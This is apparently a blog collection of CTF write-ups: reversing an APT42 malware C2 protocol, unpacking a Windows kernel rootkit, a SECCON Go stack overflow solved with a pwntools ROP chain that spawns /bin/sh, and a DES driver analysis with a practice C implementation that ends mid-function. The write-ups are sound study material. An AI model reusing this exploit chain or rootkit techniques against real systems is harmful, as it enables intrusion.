Google CTF2018 - APT42 Part1

ntpdate

Problem Description:

We have detected weird traffic on our network and we cannot figure out the source. Forensics didn’t find anything besides maybe the NTP service binaries which have been modified recently on some hosts. We ran them through the sandboxes and they seem to work as intended, can you do a quick manual pass?

The malware overwrites sleep@.got.plt to 0x408e38 (hint from IDA7)

Deobfuscate the junk code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import idaapi

sig = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0x04, 0x24, 0x10, 0xc3]
for i in range(10):
sig.append(0xFF)

start = idaapi.get_segm_by_name(".text").startEA
end = idaapi.get_segm_by_name(".text").endEA

print sig
for i in range(start, end):
test = [Byte(j) for j in range(i, i + len(sig))]
if test == sig:
for j in range(i, i + len(sig)):
PatchByte(j, 0x90)
i += len(sig)

Fix the binary and decode the strings:

1
2
3
4
5
def decrypt_str(ea, key, round):
round_key = key
for i in reversed(xrange(0, round, 4)):
round_key = (round_key * 0x5851F42D4C957F2DL + 1) & ((1 << 64) - 1)
PatchDword(ea + i, Dword(ea + i) ^ (round_key >> 32))

Reverse the C2 protocol and get flag!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
import binascii

def secret_key(str):
result = 0
for c in str:
result = result ^ ord(c)
return result

def protocol(str):
payload = chr(len(str) + 10) + '\x00\x00\x00'
p.send(payload)

mystery = '\x7E\xF4\xF0\x42\x88\xE7\x8B\x0E'
p.send(mystery)

mystery2 = str + '\x00'
p.send(mystery2)

key = chr(secret_key(mystery) ^ secret_key(mystery2))
p.send(key)

recv_1 = p.recv(4)
print recv_1[0]
print 'c2 recv 1 = ', recv_1

recv_2 = p.recv(8)
print 'c2 recv 2 = ', recv_2

recv_3 = p.recv(ord(recv_1[0]) - 8 - 1)
print 'c2 recv 3 = ', recv_3
key = secret_key(recv_2) ^ secret_key(recv_3)

print 'c2 recv 4 = ', p.recv(1)

def exploit():
protocol('part1 flag')


if __name__ == '__main__':
p = remote('mlwr-part1.ctfcompetition.com', 4242)

exploit()

Unpacking Windows Rootkit

infected.zip

1. Unpack the rootkit

Obtain this sample from a cool malware researcher. Debug rootkit by IDA + Windbg.
PEID & PE Detector fail to find packer but clearly the DriverEntry is full of crap:

Debugging the packer for a while, function 0xA974B931 (base address 0xA974A000) leads to unpacking routine:

Lots, lots of functions are designed to decrypt data/code in .data section. SMC is everywhere for sure.
E.g one of the numerous decryption function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
_BYTE *sub_A975338A()
{
int v0; // esi@1
_BYTE *v1; // edi@1
_WORD *v2; // eax@2
signed int v3; // edx@2
signed int v5; // [sp+8h] [bp-4h]@1

v5 = -4097;
v0 = -4100;
v1 = (_BYTE *)sub_A9753414();
if ( ((unsigned __int8)(*v1 - 94) ^ 0x6E) != -52 )
{
v2 = v1;
v3 = -24622;
do
{
if ( ((unsigned __int16)(*v2 - 1582) ^ 0x72E) == -722 )
v5 = v0;
v0 = (v3++ + 1) ^ 0x702E;
v2 = &v1[2 * v3 + 49244];
}
while ( ((unsigned __int8)(*(_BYTE *)v2 - 94) ^ 0x6E) != -52 );
if ( v5 != -4097 )
*(_WORD *)&v1[2 * (v5 ^ 0x702E) + 49244] = 0;
}
return v1;
}

Also anti-IDA trick can be found:

As a packer, it should call some memory allocation function like ExAllocatePool for releasing unpacked code / image. However, IAT in packed code does not include ExAllocatePool.

Packer must dynamically load ExAllocatePool via three methods:

  1. MmGetSystemRoutineAddress. UNICODE_STRING is supposed to be found.
  2. Looping nt’s export table and calculate the function address. Nt base address should be found somewhere.
  3. idk but there must exist third method.

After a while, method #2 is noticed:

Addresses of ExAllocatePool and ExFreePool are inferred and stored in the .data section.
This is part of loop in the rootkit (loop 256 times, call RtlCompressBuffer & RtlGetCompressionWorkSpaceSize). It strongly indicated part of unpacked code is compressed and decompressed somewhere. (http://www.literatecode.com/wzip).

Focusing on ExAllocatePool function: once a pool is created, watch this pool in the hex view until the pool is freed. (IDA memory breakpoint for kernel driver makes me anxious - it does not work stably).
Finally I found 0xA9753AA5 function is the key function. It builds a new image in the kernel memory pool. After that, the rootkit module is fully unloaded and windbg can’t found the module drv anymore.

The image size is 0x10000. Dump the memory image(of course IAT and relocation needs to be fixed.) and we get something lovely.

2. Unpacked rootkit

DriverEntry:

Some cool stuff (Unfortunately I don’t have time thorougly analyze the unpacked rootkit):

3. Other methods for unpacking

3.1 Windbg script

My friend told me he used windbg script. Cool!

3.2 Volatility

Forensic tool in this scenario should be welcomed.

3.3 Maybe some advanced technology

E.g Intel VT/EPT debugging kernel pages.

Seccon2017 - Golang Overflow

baby_stack

Reference: https://teamrocketist.github.io/2017/12/13/Pwn-SECCON-Baby-Stack/

0. Get stuck

Problem description:

1
2
Baby Stack
Can you do a traditional stack attack?

Baby’s problem - it should be simple and straightforward. But…

WTF it’s golang binary. Real entry point@401000.

Like usual C program challenge, program crashes when you input a long string.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
goroutine 1 [running]:
runtime.systemstack_switch()
/usr/lib/go-1.6/src/runtime/asm_amd64.s:245 fp=0xc82003bb60 sp=0xc82003bb58
runtime.mallocgc(0x4141414141414141, 0x0, 0xc800000003, 0xc82006e000)
/usr/lib/go-1.6/src/runtime/malloc.go:665 +0x9eb fp=0xc82003bc38 sp=0xc82003bb60
runtime.rawstring(0x4141414141414141, 0x0, 0x0, 0x0, 0x0, 0x0)
/usr/lib/go-1.6/src/runtime/string.go:284 +0x70 fp=0xc82003bc80 sp=0xc82003bc38
runtime.rawstringtmp(0x0, 0x4141414141414141, 0x0, 0x0, 0x0, 0x0, 0x0)
/usr/lib/go-1.6/src/runtime/string.go:111 +0xb7 fp=0xc82003bcb8 sp=0xc82003bc80
runtime.slicebytetostring(0x0, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x0, 0x0)
/usr/lib/go-1.6/src/runtime/string.go:93 +0x6f fp=0xc82003bd50 sp=0xc82003bcb8
main.main()
/home/yutaro/CTF/SECCON/2017/baby_stack/baby_stack.go:23 +0x2f8 fp=0xc82003bf50 sp=0xc82003bd50
runtime.main()
/usr/lib/go-1.6/src/runtime/proc.go:188 +0x2b0 fp=0xc82003bfa0 sp=0xc82003bf50
runtime.goexit()
/usr/lib/go-1.6/src/runtime/asm_amd64.s:1998 +0x1 fp=0xc82003bfa8 sp=0xc82003bfa0

And I lost here. After a while I found something interesting:

1
2
3
4
5
6
7
p.recvuntil(' >> ')
test = 0x526360 # points to string "attempt to execute C"

p.sendline('1'*20)
p.recvuntil(' >> ')
p.sendline('1'*104 + p64(test))
p.interactive()

Program does not crash. Instead, it prints out “attempt to execute C”.

Then I get stuck.

1. Solution

The vulnerability is main_memcpy.
Before fmt_Printf is being called, the $RSP contains format string address & string len - Golang pass the arguments by stack.

When we sent ‘1’*104+p64(0x526360) to the program (Additional 0xA0 for LF), the stack scenario is:

Do the memory search in IDA, return address 0x429ef0 is stored at stack addr 0xC82002DF48. The start address of our input string at stack is 0xC82002DDB0. Send 0xC82002DDB0 - 0xC82002DF48 = 408 bytes, we can smash the stack.

However the program crashes when it calls runtime_slicebytetostring.

When runtime_slicebytetostring works normally, the arguments in the stack should be p64(0) + p64(0xC82002DDB0). Similarly, qword 0xC82002DE78 is stored at stack addr 0xC82002DE78. 0xC82002DE78 - 0xC82002DDB0 = 200. We should tweak our payload now.

1
2
3
4
5
6
7
8
9
10
p.recvuntil(' >> ')
test = 0x526360

p.sendline('1'*10)
p.recvuntil(' >> ')
payload = '1'*104 + p64(test) + p64(20)
payload += '2'*80 + p64(test) + p64(0)
payload += '3'*(408-120-96) + p64(0xdeaddead)
p.sendline(payload)
p.interactive()

And get error message about 0xdeaddead.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[*] Switching to interactive mode
Thank you, attempt to execute C!
msg :
unexpected fault address 0xdeaddead
fatal error: fault
[signal 0xb code=0x1 addr=0xdeaddead pc=0xdeaddead]

goroutine 1 [running]:
runtime.throw(0x507550, 0x5)
/usr/lib/go-1.6/src/runtime/panic.go:547 +0x90 fp=0xc82002df00 sp=0xc82002dee8
runtime.sigpanic()
/usr/lib/go-1.6/src/runtime/sigpanic_unix.go:27 +0x2ab fp=0xc82002df50 sp=0xc82002df00
[*] Process './baby_stack' stopped with exit code 2 (pid 25105)
[*] Got EOF while reading in interactive
$

We can obtain shell by

1
syscall(RAX=0x3b, RDI=@'/bin/sh', RSI=0, RDX=0) <- ROP

Final payload written by TeamRocketIST.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
def getConn():
return process('./baby_stack-7b078c99bb96de6e5efc2b3da485a9ae8a66fd702b7139baf072ec32175076d8') if local else remote('baby_stack.pwn.seccon.jp', 15285)
local = False
r = getConn()
padding = 'A' * 104
r.recvuntil('Please tell me your name >> ')
r.sendline('A')
r.recvuntil('Give me your message >> ')
BSS = 0x59F920
ropchain = ''
# setting /bin/sh into bss address
ropchain += p64(0x4016ea) # pop rax ; ret
ropchain += p64(BSS) # @.data
ropchain += p64(0x0000000000470931) # pop rdi ; or byte ptr [rax + 0x39], cl ; ret
ropchain += p64(BSS) # @.data
ropchain += p64(0x4016ea) # pop rax ; ret
ropchain += '/bin/sh\x00'
ropchain += p64(0x0000000000456499) # mov qword ptr [rdi], rax ; ret
# clear rsi and rdx registers
ropchain += p64(0x4016ea) # pop rax ; ret
ropchain += p64(BSS) # @.data
ropchain += p64(0x00000000004a247c) # pop rdx ; or byte ptr [rax - 0x77], cl ; ret
ropchain += p64(0x0)
ropchain += p64(0x000000000046defd) # pop rsi ; ret
ropchain += p64(0x0)
# setting rax into execve 0x3b syscall number
ropchain += p64(0x00000000004016ea) # pop rax ; ret
ropchain += p64(0x3b)
# call system call
ropchain += p64(0x0000000000456889) # syscall ; ret
r.sendline(padding + p64(0xc82003fd58) + p64(0x00) + 'A'*80 + p64(0xc82003fd58) + p64(0x00) + 'A'*192 + ropchain)
r.interactive()

Reference: https://teamrocketist.github.io/2017/12/13/Pwn-SECCON-Baby-Stack/
Reference: http://shift-crops.hatenablog.com/entry/2017/12/09/200440

Dissecting DES encryption embedded in sys file

ippatsu.exe
nyuukon.sys

Binary files ippatsu.exe and nyuukon.sys are from hctf2017 reverse engineering challenge level #4.
Nobody solves this challenge during the ctf. Sadly, there is no writeup for this challenge after the game.

My research shows that some code in nyuukon.sys is so wrong that we can’t decrypt the correct flag. If you look deep into the binary file, you may find out that the author of this challenge might not be really good at C programming.
However, I still enjoy reversing x86-64 sys file with crypto component.

1. ippatsu.exe

ippatsu.exe calls DeviceIoControl to communicate with nyuukon.sys. IOCTL code 0x22A444 sends user input buffer to the kernel driver.
IOCTL code 0x226448u receives output buffer from kernel driver.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
if ( DeviceIoControl(v5, 0x22A444u, user_input, 0x100u, 0i64, 0, (LPDWORD)&BytesReturned, 0i64) )
{
printf("SEND SUCCESS\n\n");
if ( DeviceIoControl(v5, 0x226448u, 0i64, 0, &recv, 0x400u, (LPDWORD)&BytesReturned, 0i64) )
{
printf("RECV SUCCESS\n\n");
CloseHandle(v5);
}
else
{
printf("RECV FAILED\n\n");
CloseHandle(v5);
}
}

2. nyuukon.sys

Apart from some WDF related procedures, sub_FFFFF88026B8062C is the main routine for nyuukon.sys.

Function communication handles IRP_MJ_DEVICE_CONTROL request.
For IOCTL code 0x22A444u, nyuukon.sys receives user input from irp->AssociatedIrp.SystemBuffer and encrypts the input by
const DES key.
For IOCTL code 0x226448u, nyuukon.sys checks whether the encrypted result is correct.

IDA Plugin:

  1. DriverBuddy.
  2. Find Crypt / Signsrch.
  3. Windwos IOCTL Decoder.

2.1 Key expansion

nyuukon.sys calls function FFFFF88026B80B6C for DES key expansion.

‘deedbeef’ is supposed to be the des key.

1
2
.data:FFFFF88026B83048 ; char deedbeef[]
.data:FFFFF88026B83048 deedbeef db 'deadbeef',0 ; DATA XREF: KeyExpansion+2Bo

2.1.1 Eliminate parity bit (redundant) and then do pc-1 permutation

According to https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Slides/Slides-6.pdf, here is the key expansion procedure:

Eliminate parity bit seems to be redundant because pc-1 permutation is supposed to remove the parity bits (64 bits -> 56 bits).
Function FFFFF88026B80320(Named as Byte2BitArray) transforms left 7 bytes des key to char[56 + 1] bit array. The first byte in bit array starts at index 1.

2.1.2 Rotate the key and then do pc-2 permutation

nyuukon.sys stores sequence of 16 DES subkeys in FFFFF88026B851C1.

pc-2 permutation(compress subkey): 56 bits -> 48 bits.

2.2 DES Encryption Routine

2.2.1 IP permutation and Feistel struct

After IP permutation(64 bits -> 64 bits), DES does the real encryption via Feistel structure.

$R_i=f(R_{i-1}, K_i) \oplus L_{i-1}$
$L_i=R_{i-1}$

2.2.2 f Function

2.2.2.1 E box and XOR subkey

$R_{i-1}$ does E(expansion) permutation (32bits -> 48bits) and xor with subkey by pxor.

2.2.2.2 S box and P box


Since we get 48 bits input for S box, each S box has 6 bits input.

$b_0b_1b_2b_3b_4b_5$: $b_0b_5$ is the S box row index, $b_1b_2b_3b_4b_5$ is the S box column index.

Finally Feistel does P box permutation(32 bits -> 32 bits).

2.2.3 IP reverse and hexlify output

IP reverse: 64 bits -> 64 bits.

3. My DES code for practice purpose

des.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
#ifndef _DES_H
#define _DES_H

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <getopt.h>
#include <assert.h>

#define BITS 8
#define DES_BLOCK_SIZE 8
#define DES_KEY_ROUND 16
#define DES_ENCRYPTION_ROUND 16

static const char * optstring = "e:k:d:o::";

static const char des_table_ip[] = {
58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7
};

static const char des_table_pc1[] = {
57, 49, 41, 33, 25, 17, 9, 1,
58, 50, 42, 34, 26, 18, 10, 2,
59, 51, 43, 35, 27, 19, 11, 3,
60, 52, 44, 36, 63, 55, 47, 39,
31, 23, 15, 7, 62, 54, 46, 38,
30, 22, 14, 6, 61, 53, 45, 37,
29, 21, 13, 5, 28, 20, 12, 4
};

static const int des_table_key_rotate[] = {
0, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1
};

static const char des_table_pc2[] = {
14, 17, 11, 24, 1, 5,
3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8,
16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55,
30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53,
46, 42, 50, 36, 29, 32
};

static const char des_table_expansion[] = {
32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1
};

static const int des_table_sbox[][4][16] = {
{
{14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7},
{ 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8},
{ 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0},
{15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13},
},

{
{15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10},
{ 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5},
{ 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15},
{13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9},
},

{
{10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8},
{13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1},
{13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7},
{ 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12},
},

{
{ 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15},
{13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9},
{10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4},
{ 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14},
},

{
{ 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9},
{14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6},
{ 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14},
{11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3},
},

{
{12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11},
{10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8},
{ 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6},
{ 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13},
},

{
{ 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1},
{13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6},
{ 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2},
{ 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12},
},

{
{13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7},
{ 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2},
{ 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8},
{ 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11},
},
};

static const char des_table_pbox[] = {
16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25
};

static const char des_table_ip_reverse[] = {
40, 8, 48, 16, 56, 24, 64, 32, 39,7, 47, 15, 55, 23, 63, 31,
38 ,6, 46, 14, 54, 22, 62, 30, 37,5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28, 35,3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26, 33,1, 41,9, 49, 17, 57, 25
};

struct des_sub_key {
unsigned char c[4]; /* 28 bits. */
unsigned char d[4]; /* 28 bits. */
unsigned char concatenated_key[7]; /* 56 bits. */

/* key = PC-2(concatenate_key). Only key is used for encryption routine.*/
unsigned char key[6]; /* 48 bits. */
};

struct des_sub_ciphertext {
unsigned char l[4]; /* 32 bits. */
unsigned char r[4]; /* 32 bits. */
unsigned char f[4]; /* 32 bits. Feistel result. */
};

enum {
DES_ECB_ENCRYPT = 0, /* Only support ECB now. */
DES_ECB_DECRYPT,
DES_UNKNOWN
};

#endif

des.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
#include "des.h"

/** Simple DES ECB encryption / decryption implementation.
*
* Usage: ./des -e 12345678 -k 10101010
*
* This is just a baby version. Only supports 8-bytes plaintext because the
* padding scheme is not yet implemented.
*
* Only supports ECB encryption now.
*
* This code does not work efficiently.
* E.g. permutation can be done MUCH faster.
*
* Key parity bit, weak key is not detected.
*
* Document is not done.
*
* You can verify the output is correct simply by Python.
*/

void des_permutation(char *dst, char *src, const char *table, int table_size) {
/* dst must be memset to 0. */
for (int i = 0; i < table_size; i++) {
/* Just bitset.
Probably most efficient way to implement permutation in software:
http://programming.sirrida.de/calcperm.php
*/
int shift_size = ((table[i] - 1) % BITS);
uint8_t bit_map = 0x80 >> shift_size;
unsigned char target_bit = src[(table[i] - 1) / BITS] & bit_map;
target_bit <<= shift_size;
dst[i / BITS] |= (target_bit >> (i % BITS));
}
}

void des_key_split(char *key, struct des_sub_key *sub_key) {
/* Just split K to C0 and D0. K = C0 || D0. */
/* K 56bits */
/* | C0(28bits) | D0(28bits) |*/
int i, j;
for (i = 0; i < 3; i++) {
sub_key[0].c[i] = key[i];
}
sub_key[0].c[i] = key[i] & 0xF0;

for (j = 0; j < 3; j++) {
sub_key[0].d[j] = ((key[i + j] & 0xF) << 4) |
(((key[i + j + 1]) & 0xF0) >> 4);
}

sub_key[0].d[j] = ((key[i + j]) & 0x0F) << 4;
}

void des_key_rotate(unsigned char *previous_harved_key,
unsigned char *next_key_halved, int round) {
assert(round >= 1 && round < sizeof(des_table_key_rotate) / sizeof(int));

/* Default DES key rotate direction is left. */
/* Of course CTF problem may change the direction to the right. */
int shift_size = des_table_key_rotate[round];

assert(shift_size >= 1 && shift_size <= 2);

/* Just rotate the bit to the left. */
/* 111000011001100101010101111 -> rotate 1
110000110011001010101011111
*/
if (shift_size == 1) {
int shifted_bit = previous_harved_key[0] & 0x80;
next_key_halved[0] = (previous_harved_key[0] << 1) |
((previous_harved_key[1] & 0x80) >> 7);
next_key_halved[1] = (previous_harved_key[1] << 1) |
((previous_harved_key[2] & 0x80) >> 7);
next_key_halved[2] = (previous_harved_key[2] << 1) |
((previous_harved_key[3] & 0x80) >> 7);
next_key_halved[3] = ((previous_harved_key[3] & 0x70) << 1) |
(shifted_bit >> 3);
} else if (shift_size == 2) {
int shifted_bit = previous_harved_key[0] & 0xC0;
next_key_halved[0] = (previous_harved_key[0] << 2) |
((previous_harved_key[1] & 0xC0) >> 6);
next_key_halved[1] = (previous_harved_key[1] << 2) |
((previous_harved_key[2] & 0xC0) >> 6);
next_key_halved[2] = (previous_harved_key[2] << 2) |
((previous_harved_key[3] & 0xC0) >> 6);
next_key_halved[3] = ((previous_harved_key[3] & 0x30) << 2) |
(shifted_bit >> 2);
}
}

void des_key_concatenate(unsigned char *key_first_half,
unsigned char *key_second_half, unsigned char *concatenate_key) {
/* concatenate_key = C || D. */

memcpy(concatenate_key, key_first_half, 4);

concatenate_key[3] |= (key_second_half[0] >> 4);
concatenate_key[4] |= ((key_second_half[0] & 0x0F) << 4) |
(key_second_half[1] >> 4);
concatenate_key[5] |= ((key_second_half[1] & 0x0F) << 4) |
(key_second_half[2] >> 4);
concatenate_key[6] |= ((key_second_half[2] & 0x0F) << 4) |
(key_second_half[3] >> 4);
}

void des_key_expansion(char *init_key, struct des_sub_key *sub_key) {
char key[7] = {0};

/* pc-1: permutation & remove parity bits: 8, 16, 24, 32, 40, 48, 56, 64. */
des_permutation(key, init_key, des_table_pc1, sizeof(des_table_pc1));

/* Split key to C0 and D0. */
des_key_split(key, sub_key);

/* Round 0 serves for C0 D0 initialization. */
for (int i = 1; i <= DES_KEY_ROUND; i++) {
/* Ci = Rotate(Ci-1). */
des_key_rotate(sub_key[i - 1].c, sub_key[i].c, i);
/* Di = Rotate(Di-1). */
des_key_rotate(sub_key[i - 1].d, sub_key[i].d, i);

/* concatenated_key = Ci||Di. */
des_key_concatenate(sub_key[i].c, sub_key[i].d,
sub_key[i].concatenated_key);

/* key = PC-2(Concatenated_key). */
des_permutation(sub_key[i].key, sub_key[i].concatenated_key,
des_table_pc2, sizeof(des_table_pc2));
}
}

void des_split_ciphertext(char *p, struct des_sub_ciphertext *sub_ciphertext) {
memcpy(sub_ciphertext->l, p, 4);
memcpy(sub_ciphertext->r, p + 4, 4);
}

void des_concatenate_final_ciphertext(unsigned char *l, unsigned char *r,
unsigned char *result) {
/* Reverse order. */
memcpy(result, r, 4);
memcpy(result + 4, l, 4);
}

void des_xor(unsigned char *a, unsigned char *b, unsigned char *result,
int len) {
for (int i = 0; i < len; i++) {
result[i] = a[i] ^ b[i];
}
}

void des_split_xor_expansion(unsigned char *split_result,
unsigned char *xor_result) {
/* Split 48 bits to 6 groups of 8 bits. */

split_result[0] = xor_result[0] >> 2;
split_result[1] = ((xor_result[0] & 0x3) << 4) |
((xor_result[1] & 0xF0) >> 4);
split_result[2] = ((xor_result[1] & 0x0F) << 2) |
((xor_result[2] & 0xC0) >> 6);
split_result[3] = xor_result[2] & 0x3F;

split_result[4] = xor_result[3] >> 2;
split_result[5] = ((xor_result[3] & 0x3) << 4) |
((xor_result[4] & 0xF0) >> 4);
split_result[6] = ((xor_result[4] & 0x0F) << 2) |
((xor_result[5] & 0xC0) >> 6);
split_result[7] = xor_result[5] & 0x3F;
/*
0 1 2 3 4
[1110 11][11 | 1111] [1111 | 11][10 1111]| [1110 11]11 |1111 1111| 1110 1111
0 1 2 3 4 5
*/
}

void des_feistel_function(unsigned char *previous_r, unsigned char *sub_key,
unsigned char *fesitel_result) {
unsigned char r_expansion[6] = {0};
unsigned char xor_result[6];
unsigned char split_result[8];
unsigned char s_box_result[4];

/* E-box. */
des_permutation(r_expansion, previous_r, des_table_expansion,
sizeof(des_table_expansion));

/* Xor with sub_key. */
/* xor_result = r_expansion xor sub_key. */
des_xor(r_expansion, sub_key, xor_result, sizeof(r_expansion));

/* For xor result, we get b1 b2 b3 b4 b5 b6. */
/* b1b6 serves as row number and b2b3b4b5 serves as column number. */
des_split_xor_expansion(split_result, xor_result);

for (int i = 0; i < 8; i += 2) {
/* For s-box, every group of 6 bit maps to only 4 bit. */
int row_number[] = {
((split_result[i] & 0x20) >> 4) | (split_result[i] & 0x1),
((split_result[i + 1] & 0x20) >> 4) | (split_result[i + 1] & 0x1)
};

int column_number[] = {
(split_result[i] >> 1) & 0xF,
(split_result[i + 1] >> 1) & 0xF
};

s_box_result[i / 2] =
(des_table_sbox[i][row_number[0]][column_number[0]] << 4) |
(des_table_sbox[i + 1][row_number[1]][column_number[1]]);
}

/* Finally, use P box. */
des_permutation(fesitel_result, s_box_result, des_table_pbox,
sizeof(des_table_pbox));
}

void des_main_routine(char *init_p, char *init_key, char *output,
int operation) {
/* p must be padded 8-bytes. */
/* key must be 8-bytes. */
char p[DES_BLOCK_SIZE] = {0};

/* + 1 for initialization. */
struct des_sub_key sub_key[DES_KEY_ROUND + 1] = {{{0}}};
struct des_sub_ciphertext sub_ciphertext[DES_ENCRYPTION_ROUND + 1] =
{{{0}}};

char concatenate_ciphertext[8];

/* First, do IP permutation to the plaintext. */
des_permutation(p, init_p, des_table_ip, sizeof(des_table_ip));

/* Second, key expansion process. */
des_key_expansion(init_key, sub_key);

/* Third, split ciphertext into left and right. */
des_split_ciphertext(p, &sub_ciphertext[0]);

/* Fourth, do round function. */

unsigned char *round_key;
for (int i = 1; i <= DES_ENCRYPTION_ROUND; i++) {
/* Li = Ri-1. */
memcpy(sub_ciphertext[i].l, sub_ciphertext[i - 1].r, 4);

/* Ri = Li-1 xor f(Ri-1, sub_key). */
if (operation == DES_ECB_ENCRYPT) {
round_key = sub_key[i].key;
} else {
round_key = sub_key[16 - i + 1].key;
}
des_feistel_function(sub_ciphertext[i - 1].r, round_key,
sub_ciphertext[i].f);
des_xor(sub_ciphertext[i].f, sub_ciphertext[i - 1].l,
sub_ciphertext[i].r, 4);
}

/* So in round 16, there is no need to ...*/

